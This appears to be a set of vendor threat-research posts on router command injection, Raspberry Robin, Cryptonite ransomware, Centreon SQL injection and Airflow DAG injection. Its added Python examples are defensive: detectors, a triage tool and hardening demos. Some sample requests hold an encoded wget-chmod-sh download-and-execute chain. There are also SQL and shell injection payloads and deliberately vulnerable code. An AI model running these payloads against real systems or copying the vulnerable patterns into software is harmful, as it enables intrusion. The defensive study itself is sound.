Posts

TOTOLINK A3000RU Command Injection

Zioncom (Hong Kong) Technology Limited, also known as TOTOLINK, is a manufacturer of network communication products, including wireless routers/APs (indoor and outdoor), wireless USB adapters, wireless modules, switches and wired routers. ZIONCOM (HK) was established in 1999.

The A3000RU is a wireless router that complies with the IEEE 802.11ac Wave 2 Wi-Fi standard, with MU-MIMO technology offering continual high-speed data transmission for multiple devices at the same time.

A command injection vulnerability exists in the TOTOLINK A3000RU router.

Command Injection Vulnerability
The goal of a command injection attack is the execution of arbitrary commands on the host operating system via a vulnerable application. Command injection is possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. The attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

TOTOLINK A3000RU Command Injection | CVE-2022-25075
TOTOLink A3000RU V5.9c.2280_B20180512 was discovered to contain a command injection vulnerability in the “Main” function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.

In the exploit observed, the attacker passes a command such as ‘wget’ through the query string. This downloads the script toto.sh from an attacker-controlled web server; the attacker then changes the script’s permissions to make it executable and runs it on the device.
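The pattern above (a shell separator followed by a download-and-execute chain inside QUERY_STRING) is easy to hunt for in web-server or proxy logs. The following Python is an added example written for this post, not code from SonicWall or from the TOTOLINK firmware: it URL-decodes the query string of each request line (repeatedly, to catch double encoding) and flags shell separators followed by a download or execution command. The request lines, the /cgi-bin/app.cgi path and the 192.0.2.10 address are constructed for the example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Shell constructs that let an injected command follow whatever the CGI expected,
# plus start-of-string (the whole QUERY_STRING may be handed to the shell as-is).
SEPARATOR = r"(?:^|;|\|\|?|&&|`|\$\(|\n)"
# Commands that show up in IoT download-and-execute chains.
COMMANDS = ("wget", "curl", "tftp", "busybox", "chmod", "sh", "bash", "nc", "telnet")
INJECTION_RE = re.compile(
    SEPARATOR + r"\s*(" + "|".join(COMMANDS) + r")(?=\s)", re.IGNORECASE)

# Constructed request lines: /cgi-bin/app.cgi is a stand-in path, 192.0.2.10 a documentation address.
SAMPLE_REQUESTS = [
    "GET /cgi-bin/app.cgi?action=login&user=admin HTTP/1.1",
    "GET /search?q=how+to+wget+files HTTP/1.1",
    "GET /cgi-bin/app.cgi?%3Bwget+http%3A%2F%2F192.0.2.10%2Ftoto.sh+-O+%2Ftmp%2Ftoto.sh"
    "%3Bchmod+777+%2Ftmp%2Ftoto.sh%3Bsh+%2Ftmp%2Ftoto.sh HTTP/1.1",
    "GET /cgi-bin/app.cgi?x=%2524(curl%2520http%3A%2F%2F192.0.2.10%2Fa) HTTP/1.1",  # double-encoded
]


def decode_query(query: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so double-encoded payloads are not missed."""
    for _ in range(max_rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query


def inspect_request_line(line: str):
    """Return a finding if the query string carries a shell command chain, else None."""
    parts = line.split()
    if len(parts) < 2:
        return None
    method, target = parts[0], parts[1]
    url = urlsplit(target)
    if not url.query:
        return None
    decoded = decode_query(url.query)
    commands = [m.group(1).lower() for m in INJECTION_RE.finditer(decoded)]
    if not commands:
        return None
    return {"method": method, "path": url.path, "decoded_query": decoded, "commands": commands}


def scan(lines) -> list:
    """Run the check over a batch of request lines and keep only the hits."""
    return [finding for finding in map(inspect_request_line, lines) if finding]


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding["path"], finding["commands"], finding["decoded_query"])
```

The second sample line shows the trade-off: the word wget inside an ordinary parameter value is not flagged, because the rule requires a separator in front of the command. Tune COMMANDS and SEPARATOR to the shells and binaries present on the device class you are watching.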

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • IPS 15515:TOTOLINK A3000RU Command Injection

IoCs
179.43.142.11
36db973e85684633846a2cd9c46ca48896b5703b9aeb174b1f741633428f68c1

Threat Graph

Raspberry Robin Malware Is An Obfuscated Onion

This week, the SonicWall Capture Labs Threat Research Team analyzed a new sample of Raspberry Robin. First observed in May 2022 by Red Canary, Raspberry Robin is a worm that has evolved to be a delivery system for a host of threat actors and malware platforms (This currently includes EvilCorp, LockBit, BumbleBee, IcedID, and DEV-0950). It is unique in that the authors are using a custom obfuscation method that virtualizes the code and has 15+ layers to prevent detection and/or analysis, as well as deploying a custom Tor client for C2 communications.

Infection Chain

Raspberry Robin is known to spread via infected USB devices, relying on the ‘AutoRun’ behaviour when a drive is plugged in. The malware runs via a .LNK file on the USB drive that executes ‘MSIExec.exe’ to download a first-stage payload. Once the system is found to be a valid target, the second-stage payload is dropped and connects to a Tor address. Initial analysis of the dropper shows that it begins as a small .zip file (950 KB to 1250 KB) which unpacks another .zip file of roughly the same size. This second archive unpacks into a ~700 MB setup file with a .cpl (Control Panel Item) extension and a text file with instructions to run the installation (Figure 1). Successful execution creates persistence with a RunOnce key in the registry (under HKEY_CURRENT_USER), and the next stage is downloaded.

Analysis


Figure 1: First stage that creates a .LNK file on any attached USB

The first item to note is the size of the dropper: a 700 MB file once unpacked. Most of this is garbage data located in the final section (Figure 2). The massively inflated size is an attempt to bypass scanning by AV/EDR products that skip files above a size threshold, and to keep the file from being uploaded to public sandboxes, which enforce upload size limits.

Figure 2: Note the bottom section ‘.rxy’ has a massive size; it is nothing but the character ‘[‘ repeated
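One way to spot the padding trick described above without opening the file in a viewer is to walk the PE section table and measure each section’s byte distribution. The following Python is an added example, not part of the original analysis and not a SonicWall tool: it parses the section headers with struct alone (no pefile dependency) and flags sections dominated by a single byte value. The sample PE is a minimal, constructed skeleton with a small .text section and a large .rxy section filled with ‘[’; real samples carry an optional header and more sections, which the parser handles because it honors SizeOfOptionalHeader and NumberOfSections.

```python
import math
import struct
from collections import Counter

COFF_HDR = struct.Struct("<HHIIIHH")         # IMAGE_FILE_HEADER (20 bytes)
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")  # IMAGE_SECTION_HEADER (40 bytes)


def parse_sections(pe: bytes):
    """Yield (name, raw_offset, raw_size) for every entry in the PE section table."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    _machine, nsections, _ts, _symtab, _nsyms, opt_size, _chars = COFF_HDR.unpack_from(pe, coff_off)
    table = coff_off + COFF_HDR.size + opt_size   # section table follows the optional header
    for i in range(nsections):
        name, _vsize, _vaddr, raw_size, raw_ptr, *_ = SECTION_HDR.unpack_from(
            pe, table + i * SECTION_HDR.size)
        yield name.rstrip(b"\0").decode("ascii", "replace"), raw_ptr, raw_size


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte; 0.0 for a single repeated value, 8.0 for a uniform distribution."""
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values()) if n else 0.0


def find_padding_sections(pe: bytes, min_ratio: float = 0.9, max_entropy: float = 1.0) -> list:
    """Flag sections whose raw bytes are dominated by one value or have near-zero entropy."""
    findings = []
    for name, off, size in parse_sections(pe):
        raw = pe[off:off + size]
        if not raw:
            continue
        top_byte, top_count = Counter(raw).most_common(1)[0]
        ratio = top_count / len(raw)
        ent = shannon_entropy(raw)
        if ratio >= min_ratio or ent <= max_entropy:
            findings.append({
                "section": name,
                "raw_size": len(raw),
                "top_byte": chr(top_byte),
                "ratio": round(ratio, 3),
                "entropy": round(ent, 3),
                "share_of_file": round(len(raw) / len(pe), 3),
            })
    return findings


def build_sample_pe() -> bytes:
    """Constructed stand-in: a minimal PE skeleton (no optional header) with a small .text
    section and a large .rxy section that is nothing but '[' repeated."""
    text = bytes(range(256)) * 4               # 1 KiB of varied bytes (entropy 8.0)
    rxy = b"[" * (64 * 1024)                   # 64 KiB of a single byte value
    e_lfanew = 0x40
    header_len = e_lfanew + 4 + COFF_HDR.size + 2 * SECTION_HDR.size
    text_off = (header_len + 0x1FF) & ~0x1FF   # 512-byte file alignment
    rxy_off = text_off + len(text)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = COFF_HDR.pack(0x14C, 2, 0, 0, 0, 0, 0x0102)  # i386, 2 sections, SizeOfOptionalHeader 0
    sections = (
        SECTION_HDR.pack(b".text", len(text), 0x1000, len(text), text_off, 0, 0, 0, 0, 0x60000020)
        + SECTION_HDR.pack(b".rxy", len(rxy), 0x2000, len(rxy), rxy_off, 0, 0, 0, 0, 0x40000040)
    )
    header = dos + b"PE\0\0" + coff + sections
    return header + b"\0" * (text_off - len(header)) + text + rxy


if __name__ == "__main__":
    for finding in find_padding_sections(build_sample_pe()):
        print(finding)
```

On a real sample, feed the file bytes to find_padding_sections; a section that is almost the whole file and almost all one byte is the tell. Hashing the file with that section truncated gives a stable identifier across variants that only change the padding length.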

Figure 3: PeStudio results of the secondary layer showing no libraries, imports, exports

Both the dropper and the payload are built with multiple layers of anti-analysis techniques; each is closer to a virtualized (VM-protected) binary than to a conventionally obfuscated file. There are no strings or imports, and therefore no API calls to use for context or to set breakpoints on in a debugger.

Figure 4: Obfuscation through instruction

Each logical operation is expanded into a series of arithmetic instructions (add, sub, mul, etc.) that manipulate flags and memory offsets and resolve imports dynamically. Although no static analysis tool identifies a packer, this behavior closely resembles how VMProtect virtualizes code to prevent or hinder analysis. Attempting to run the malware in multiple virtual environments failed to produce malicious activity, and several tools were immediately shut down when the sample was loaded for analysis. The DLL also unloads itself when a debugger is attached.

This sample is known to drop a decoy payload, located in ‘C:\User\AppData\Local\Temp’, to distract an analyst or an AV/EDR tool. The real payload uses a custom Tor client and reaches out to one of its hard-coded addresses, chosen at random, for additional payloads or C2 activity. While targets have mostly been government and telecom organizations, there is no reason other industries could not be affected in the future. Given the sophistication of Raspberry Robin, care should be taken with USB drives and with Windows policies on auto-running content.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV:RaspberryRobin.A (Dropper)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cryptonite Ransomware leaves files unrecoverable

This week, the SonicWall Capture Labs Research team analyzed a ransomware called Cryptonite. It is open-source ransomware that was once available on GitHub but has since been taken down. It exhibits behavior consistent with most ransomware, but later versions were found to malfunction, leaving encrypted data unrecoverable.

Infection Cycle:

The ransomware installer arrives as a fake Windows update and has been seen using the following filename:

  • WindowsUpdate.exe

This ransomware is written in Python, so a Python interpreter must be present on the victim’s machine for it to run. Upon execution it therefore drops all the files and modules it needs into a randomly named folder under the temp directory.

A window then pops up showing the status of the supposed software update download, complete with a progress bar.

Meanwhile, file encryption is happening in the background. Encrypted files have the extension “.cryptn8” appended to their names.

The ransomware uses the Python cryptography module, specifically its Fernet implementation (AES-128-CBC with an HMAC-SHA256 tag under a single symmetric key), to perform the encryption.

In our static analysis we found that the unique Fernet key generated for the victim appears to be sent to a remote server at hxxps://e4c0660414bf.eu.ngrok.io.

Upon successful encryption a standard warning message is then presented to the victim which allows the victim to enter a decryption key if they decide to contact the ransomware operator.

However, later samples do not complete the infection cycle. During the encryption run the application crashes with an error; the files are encrypted, but the key is never sent to the remote server, leaving them unrecoverable. Running the ransomware again simply re-encrypts the already encrypted files, so in effect it wipes out the data on the victim’s machine.
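Because Fernet tokens have a fixed, documented framing, a responder can check encrypted .cryptn8 files against candidate keys (recovered, for instance, from a memory dump or from captured traffic to the server above) with nothing but the standard library, and can read the encryption timestamp each token carries. The following Python is an added example, not Cryptonite code and not from the original post. The demo keys and the token builder are constructed for the example; the builder fills the ciphertext field with placeholder bytes because AES is not in the standard library, which is fine here since only the framing and the HMAC are checked.

```python
import base64
import hashlib
import hmac
import struct

FERNET_VERSION = 0x80
FIXED_OVERHEAD = 1 + 8 + 16 + 32   # version + timestamp + IV + HMAC-SHA256 tag

# Constructed demo keys (urlsafe base64 of 32 bytes); not keys from any real sample.
VICTIM_KEY = base64.urlsafe_b64encode(bytes(range(32)))
WRONG_KEY = base64.urlsafe_b64encode(bytes(range(32, 64)))


def parse_fernet_token(token: bytes) -> dict:
    """Split a Fernet token into its fields; no key is needed for this step."""
    try:
        raw = base64.urlsafe_b64decode(token)
    except ValueError as exc:                  # binascii.Error is a ValueError subclass
        raise ValueError(f"not base64: {exc}") from None
    if len(raw) < FIXED_OVERHEAD or raw[0] != FERNET_VERSION:
        raise ValueError("too short or missing Fernet version byte 0x80")
    if (len(raw) - FIXED_OVERHEAD) % 16:
        raise ValueError("ciphertext is not a whole number of AES blocks")
    return {
        "timestamp": struct.unpack(">Q", raw[1:9])[0],   # seconds since epoch, big-endian
        "iv": raw[9:25],
        "ciphertext": raw[25:-32],
        "tag": raw[-32:],
        "signed": raw[:-32],                               # the bytes the HMAC covers
    }


def key_authenticates(key_b64: bytes, token: bytes) -> bool:
    """True if this candidate key produced the token. Fernet signs with the first 16 key
    bytes (HMAC-SHA256) and encrypts with the last 16 (AES-128-CBC)."""
    try:
        key = base64.urlsafe_b64decode(key_b64)
        fields = parse_fernet_token(token)
    except ValueError:
        return False
    if len(key) != 32:
        return False
    expected = hmac.new(key[:16], fields["signed"], hashlib.sha256).digest()
    return hmac.compare_digest(expected, fields["tag"])


def triage(files: dict, candidate_keys: list) -> dict:
    """For each blob: is it a Fernet token, when was it produced, and which key (if any) matches."""
    report = {}
    for name, blob in files.items():
        try:
            fields = parse_fernet_token(blob)
        except ValueError as exc:
            report[name] = {"fernet": False, "reason": str(exc)}
            continue
        match = next((k for k in candidate_keys if key_authenticates(k, blob)), None)
        report[name] = {"fernet": True, "encrypted_at": fields["timestamp"], "key": match}
    return report


def make_demo_token(key_b64: bytes, ciphertext: bytes, timestamp: int) -> bytes:
    """Constructed sample only: assembles a structurally valid token around placeholder
    ciphertext bytes (no AES here), enough to exercise the framing and HMAC checks."""
    key = base64.urlsafe_b64decode(key_b64)
    body = bytes([FERNET_VERSION]) + struct.pack(">Q", timestamp) + bytes(range(16)) + ciphertext
    tag = hmac.new(key[:16], body, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(body + tag)


if __name__ == "__main__":
    token = make_demo_token(VICTIM_KEY, b"\x00" * 32, 1670000000)
    print(triage({"report.docx.cryptn8": token, "readme.txt": b"hello"}, [WRONG_KEY, VICTIM_KEY]))
```

Once a key authenticates, cryptography.fernet.Fernet(key).decrypt(token) recovers the plaintext. A decrypted result that is itself a valid token means the file was encrypted twice, which is exactly what a second run of the crashing sample produces; the timestamps of the outer and inner tokens then give the order of the runs.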

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Cryptonite.RSM  (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

 

Microsoft Security Bulletin Coverage for December 2022

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of December 2022. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2022-44673 Windows Client Server Run-Time Subsystem (CSRSS) Elevation of Privilege Vulnerability
ASPY: 387: Malicious-exe exe.MP_291

CVE-2022-44675 Windows Bluetooth Driver Elevation of Privilege Vulnerability
ASPY: 389: Malicious-exe exe.MP_293

CVE-2022-44683 Windows Kernel Elevation of Privilege Vulnerability
ASPY: 388: Malicious-exe exe.MP_292

CVE-2022-44698 Windows SmartScreen Security Feature Bypass Vulnerability
ASPY: 390: Malformed-File js.MP_27

The following vulnerabilities do not have exploits in the wild:
CVE-2022-24480 Outlook for Android Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41074 Windows Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-41076 PowerShell Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41077 Windows Fax Compose Form Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41089 .NET Framework Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41094 Windows Hyper-V Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41121 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41127 Microsoft Dynamics NAV and Microsoft Dynamics 365 Business Central (On Premises) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44666 Windows Contacts Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44667 Windows Media Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44668 Windows Media Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44669 Windows Error Reporting Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-44670 Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44671 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-44674 Windows Bluetooth Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-44676 Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44677 Windows Projected File System Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-44678 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-44679 Windows Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-44680 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-44681 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-44682 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-44687 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44689 Windows Subsystem for Linux (WSL2) Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-44690 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44691 Microsoft Office OneNote Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44692 Microsoft Office Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44693 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44694 Microsoft Office Visio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44695 Microsoft Office Visio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44696 Microsoft Office Visio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44697 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-44699 Azure Network Watcher Agent Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-44702 Windows Terminal Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-44704 Microsoft Windows Sysmon Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-44707 Windows Kernel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-44710 DirectX Graphics Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-44713 Microsoft Outlook for Mac Spoofing Vulnerability
There are no known exploits in the wild.

Centreon SQL Injection Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  Centreon is a network, system and application monitoring tool. Centreon is the only AIOps Platform Providing Holistic Visibility to Complex IT Workflows from Cloud to Edge.

  A SQL Injection vulnerability has been reported in the Centreon Web Poller Resource module. The vulnerability is due to insufficient input validation.

  A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to the server. A successful attack may result in arbitrary SQL command execution against the database on the target server.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-41142.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 7.7 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is low.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 7.7 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  An SQL injection vulnerability exists in Centreon Web. It is due to insufficient validation of the resource_activate request parameter when adding a new poller resource. An HTTP POST request is sent to /centreon/main.get.php with the parameter p set to “60904”; main.get.php then loads the script www/include/configuration/configResources/resources.php, which reads the value of the parameter o.

  When adding poller resources, parameter o is set to “a”, and resources.php loads the script www/include/configuration/configResources/formResources.php. formResources.php reads the submitA request parameter and, if it is present, calls the function insertResourceInDB() in the script www/include/configuration/configResources/DBFunc.php.

  insertResourceInDB() calls insertResource() in the same script; insertResource() assembles an SQL query from the request parameters and executes it. insertResource() sanitizes some of the request parameters but fails to sanitize resource_activate, so its value is concatenated into the query verbatim. See “Attack Delivery” below for how the crafted HTTP POST request reaches the Centreon database.
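  The defect described above is an ordinary string-concatenated INSERT with one unescaped parameter. The following Python is an added example, not Centreon’s code: it models insertResource() against a hypothetical cfg_resource table in an in-memory SQLite database (Centreon itself runs on MySQL/MariaDB), shows how a crafted resource_activate value smuggles an attacker-chosen row into the table, and shows the parameterized, allow-listed version that closes the hole. The column names and the payload are constructed for the example.

```python
import sqlite3

# Hypothetical stand-in for the poller resource table (column names assumed for the example).
SCHEMA = """
CREATE TABLE cfg_resource (
    resource_id       INTEGER PRIMARY KEY AUTOINCREMENT,
    resource_name     TEXT NOT NULL,
    resource_line     TEXT NOT NULL,
    resource_comment  TEXT,
    resource_activate TEXT NOT NULL
);
"""

# Constructed payload: closes the legitimate VALUES tuple and appends a second row.
INJECTED_ACTIVATE = "1'), ('$INJECTED$', '/opt/attacker', 'added by attacker', '1"


def new_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def escape(value: str) -> str:
    """The per-field quote escaping applied to the parameters that *are* sanitized."""
    return value.replace("'", "''")


def insert_vulnerable(con, name, line, comment, activate) -> str:
    """Models insertResource(): three fields escaped, resource_activate concatenated verbatim."""
    sql = (
        "INSERT INTO cfg_resource (resource_name, resource_line, resource_comment, resource_activate) "
        f"VALUES ('{escape(name)}', '{escape(line)}', '{escape(comment)}', '{activate}')"
    )
    con.execute(sql)
    con.commit()
    return sql


def insert_hardened(con, name, line, comment, activate) -> None:
    """Bound parameters for every value, plus an allow-list for the flag field."""
    if activate not in ("0", "1"):
        raise ValueError("resource_activate must be '0' or '1'")
    con.execute(
        "INSERT INTO cfg_resource (resource_name, resource_line, resource_comment, resource_activate) "
        "VALUES (?, ?, ?, ?)",
        (name, line, comment, activate),
    )
    con.commit()


def resource_names(con) -> list:
    return [row[0] for row in con.execute(
        "SELECT resource_name FROM cfg_resource ORDER BY resource_id")]


def hardened_rejects(activate: str) -> bool:
    """True if the hardened path refuses this resource_activate value."""
    try:
        insert_hardened(new_db(), "$USER2$", "/etc/legit", "ok", activate)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    con = new_db()
    print(insert_vulnerable(con, "$USER2$", "/etc/legit", "ok", INJECTED_ACTIVATE))
    print(resource_names(con))   # ['$USER2$', '$INJECTED$']
```

  The row-smuggling form is used because sqlite3’s execute() refuses stacked statements; against a driver that accepts them, the same injection point carries the stacked CREATE TABLE that the IPS signature below is named for. The escaping applied to the other three fields is not a defence for resource_activate, since the payload never needs a quote that escape() would touch.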

Triggering the Problem:

  • The target must have the vulnerable software installed.
  • The attacker must have network connectivity to the target server.
  • The attacker must have access to the Configuration > Pollers > Resources page.

Triggering Conditions:

  The attacker authenticates to the server and receives a valid token. Next, the attacker sends an HTTP request with a malicious resource_activate[resource_activate] parameter. The vulnerability is triggered when the server processes the request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 4098 Web Application SQL Injection (CREATE TABLE) 3

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Updating to a non-vulnerable version of the product.
    • Filtering attack traffic using the signature above.
  The vendor has released the following patch regarding this vulnerability:
  Vendor Advisory

Apache Airflow DAG Injection Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  Apache Airflow is an open-source workflow management platform. Apache Airflow is a flexible, scalable workflow automation and scheduling system for authoring and managing Big Data processing pipelines. Written in Python, the project is highly extensible and able to run tasks written in other languages, allowing integration with commonly used architectures and projects such as AWS S3, Docker, Apache Hadoop HDFS, Apache Hive, Kubernetes, MySQL, Postgres, Apache Zeppelin, and more.

  Airflow originated at Airbnb in 2014 and was submitted to the Apache Incubator March 2016. The Apache Software Foundation (ASF), the all-volunteer developers, stewards, and incubators of more than 350 Open Source projects and initiatives, announced Apache® Airflow™ as a Top-Level Project (TLP).

  An OS command injection vulnerability has been reported in Apache Airflow. This vulnerability is due to improper validation of user-supplied parameters in example directed acyclic graphs (DAGs) shipped with the product.

  A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in OS command injection.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-24288.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.6 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is low.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.6 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  Airflow is designed under the principle of “configuration as code”. While other “configuration as code” workflow platforms use markup languages such as XML, Airflow uses Python, which lets developers import libraries and classes to build their workflows. The Airflow web server is built on Flask (through Flask-AppBuilder), and it is this web UI from which DAG runs, including the vulnerable one, are triggered.

  Directed Acyclic Graphs (DAGs) are collections of tasks organized to reflect their relationships and dependencies; Airflow uses them to manage workflows. The web UI supports a number of operations, including triggering a DAG run, selecting a graph, viewing trees, deleting DAGs and viewing code. The base Airflow install ships with example DAGs that demonstrate various features.

  The example DAG example_passing_params_via_test_command shows a templated command that uses echo to print a string built from its arguments. The raw values of the parameters “foo” and “miff” are interpolated into a flat command string, which is handed to the BashOperator class and executed by a shell; a value containing shell metacharacters therefore runs as a command.
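  What makes the example DAG dangerous is the step from a templated string to a shell, which the following Python reproduces outside Airflow. It is an added example written for this post, not code from Apache Airflow or from the example DAG: a hypothetical template stands in for the Jinja-rendered bash_command, a `sh -c` call stands in for BashOperator, and the malicious conf value is constructed. Three fixes are shown: shell-quoting the value, passing it through the environment so it never enters the command string, and allow-listing its shape before use.

```python
import os
import re
import shlex
import subprocess

# Hypothetical stand-in for a templated bash_command: the raw dag_run.conf value is
# pasted straight into the command string, as the template engine does for {{ ... }}.
VULNERABLE_TEMPLATE = 'echo "param: {foo}"'

# Constructed trigger payload: closes the quoted string, runs a command, comments out the rest.
MALICIOUS_CONF = {"foo": 'x"; echo INJECTED #'}

PARAM_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def render_vulnerable(conf: dict) -> str:
    """Mimics substitution of dag_run.conf["foo"] into a flat command string."""
    return VULNERABLE_TEMPLATE.format(foo=conf.get("foo", ""))


def run_sh(command: str, extra_env=None) -> str:
    """Stand-in for BashOperator: hand the string to a POSIX shell and capture stdout."""
    env = {**os.environ, **(extra_env or {})}
    result = subprocess.run(["/bin/sh", "-c", command], capture_output=True,
                            text=True, env=env, check=False)
    return result.stdout


def run_vulnerable(conf: dict) -> str:
    return run_sh(render_vulnerable(conf))


def run_quoted(conf: dict) -> str:
    """Fix 1: shell-quote the value before it enters the command string."""
    return run_sh("echo param: " + shlex.quote(conf.get("foo", "")))


def run_env(conf: dict) -> str:
    """Fix 2: keep the value out of the command string; the shell expands "$FOO" literally."""
    return run_sh('echo "param: $FOO"', {"FOO": conf.get("foo", "")})


def validate_param(value: str) -> str:
    """Fix 3: allow-list the parameter shape before it is used anywhere."""
    if not PARAM_RE.fullmatch(value):
        raise ValueError(f"rejected DAG parameter: {value!r}")
    return value


def rejects(value: str) -> bool:
    try:
        validate_param(value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", repr(run_vulnerable(MALICIOUS_CONF)))
    print("quoted:    ", repr(run_quoted(MALICIOUS_CONF)))
    print("env:       ", repr(run_env(MALICIOUS_CONF)))
```

  In a real DAG the environment route is the env argument of BashOperator, and the validation belongs in the task itself, since Jinja rendering happens before the operator sees the value. Quoting inside the template is the weakest of the three: it only works if every interpolation point is quoted correctly.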

Triggering the Problem:

  • The target host must have the affected version of the product installed and running.
  • The attacker must have network access to the target system.
  • The vulnerable DAG must be un-paused.
  • The attacker must have access to an account with the RESOURCE_DAG_RUN permission.

Triggering Conditions:

  A malicious POST request is sent to the target server to run the vulnerable DAG.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

